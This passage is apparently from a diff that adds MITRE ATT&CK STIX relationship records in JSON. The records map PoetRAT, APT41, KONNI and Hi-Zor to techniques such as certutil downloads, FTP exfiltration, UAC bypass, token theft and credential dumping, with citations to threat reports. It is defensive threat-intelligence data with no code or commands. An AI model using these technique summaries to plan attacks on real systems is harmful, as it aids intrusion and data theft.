+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--77d954c5-de84-4f4b-98b6-5ad35603ae7a",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.992Z",
+ "created": "2020-04-28T12:47:25.992Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c46db015-9917-4c7b-8152-c6ad1394baf7",
+ "type": "relationship",
+ "modified": "2020-04-28T12:47:25.998Z",
+ "created": "2020-04-28T12:47:25.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.513Z",
+ "created": "2020-04-28T13:48:00.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.518Z",
+ "created": "2020-04-28T13:48:00.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f234930f-f7d1-458d-8c79-c73538990f97",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.720Z",
+ "created": "2020-04-28T13:48:00.522Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.681Z",
+ "created": "2020-04-28T13:48:00.555Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e",
+ "type": "relationship",
+ "modified": "2020-04-30T20:31:38.908Z",
+ "created": "2020-04-28T13:48:00.652Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [FTP](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.660Z",
+ "created": "2020-04-28T13:48:00.660Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fc86f198-f9d7-4b95-b26a-9cb9b922f2f1",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.924Z",
+ "created": "2020-04-28T13:48:00.924Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--250d9854-4da5-4977-93ed-feff1cd39e3d",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.931Z",
+ "created": "2020-04-28T13:48:00.931Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9cdb5a1a-a68f-4ee2-a807-ba4c0ae8e436",
+ "type": "relationship",
+ "modified": "2020-04-28T13:48:00.947Z",
+ "created": "2020-04-28T13:48:00.947Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--29686ce0-db1e-4d77-a21c-7b1e97ee51ac",
+ "type": "relationship",
+ "modified": "2020-04-28T14:37:51.271Z",
+ "created": "2020-04-28T14:37:51.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--64764dc6-a032-495f-8250-1e4c06bdc163",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--202e5e50-09e4-431b-a786-d846beb5e009",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.671Z",
+ "created": "2020-04-28T14:51:08.671Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9dffc323-ae0a-430e-b9de-e059862432a1",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.458Z",
+ "created": "2020-04-28T18:12:13.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--27c397ca-aaa1-4cf5-b663-bde9b82050a6",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.490Z",
+ "created": "2020-04-28T18:12:13.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used tasklist.exe to get a snapshot of the current processes\u2019 state of the target machine.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--726cd7e2-d545-4ddf-8f86-fe1cab083dae",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.509Z",
+ "created": "2020-04-28T18:12:13.509Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7431e309-f379-45a5-ae7d-0520f6b17a94",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.512Z",
+ "created": "2020-04-28T18:12:13.512Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings.(Citation: Medium KONNI Jan 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--06f8a778-eebf-4d73-86d3-6ebdbf94ce46",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.518Z",
+ "created": "2020-04-28T18:12:13.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) bypassed UAC with the \u201cAlwaysNotify\u201d settings.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--36a0199f-bce6-4717-a4e4-ce3d75a7ab1c",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.561Z",
+ "created": "2020-04-28T18:12:13.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1cc6adf5-a09d-4878-b816-22af0770d3c1",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.600Z",
+ "created": "2020-04-28T18:12:13.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf5b088a-6d58-41ce-b36d-ff911fe76fb8",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.604Z",
+ "created": "2020-04-28T18:12:13.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b5c85267-6a3e-4254-a851-3529f4f80b55",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.664Z",
+ "created": "2020-04-28T18:12:13.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.814Z",
+ "created": "2020-04-29T18:44:04.814Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--207f1084-a466-4e08-a157-886db373f09a",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.977Z",
+ "created": "2020-04-29T18:44:04.977Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--eeb86f2c-852e-42e6-8809-8d244727bdfe",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.988Z",
+ "created": "2020-04-29T18:44:04.988Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7ed3bfbd-41a7-46c4-acf7-43330dd50784",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.009Z",
+ "created": "2020-04-29T18:44:05.009Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9dcf5d9f-7e68-4a5c-a51c-f3c87d5833cd",
+ "type": "relationship",
+ "modified": "2020-04-30T14:10:34.498Z",
+ "created": "2020-04-29T19:30:54.274Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Fidelis Hi-Zor",
+ "description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
+ }
+ ],
+ "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)",
+ "relationship_type": "uses",
